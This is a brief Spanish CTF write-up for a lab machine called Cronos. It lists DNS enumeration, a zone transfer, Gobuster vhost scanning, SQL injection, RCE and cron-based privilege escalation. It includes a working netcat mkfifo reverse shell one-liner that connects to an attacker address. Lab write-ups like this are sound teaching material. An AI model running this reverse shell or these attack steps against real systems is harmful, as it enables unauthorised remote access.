# Cronos

### Resumen de la resolución

* Enumeración de servicio DNS expuesto con nslookup y dig
* Enumeración de rutas http y subdominios con Gobuster
* Explotación SQLi básica
* Reverse shell explotando vulnerabilidad RCE
* Escalada de privilegios abusando de script php corriendo como tarea Cron en la máquina víctima

### Habilidades adquiridas

* Enumeración de Name Servers con nslookup

```
nslookup
server <IP>
<IP>
```

* Ataque de transferencia de Zona DNS para enumerar subdominios

```
dig axfr @<IP> <dominio.tld>
```

### Comandos y herramientas destacables

* Enumeración de subdominios con Gobuster

{% code overflow="wrap" %}

```bash
gobuster vhost -u http://<dominio.tld> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 --no-error
```

{% endcode %}

* Reverse Shell nc mkfifo

```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.10.10 9001 >/tmp/f
```

### Walkthrough en YouTube:

{% embed url="<https://www.youtube.com/watch?v=khgPpmey5g4>" %}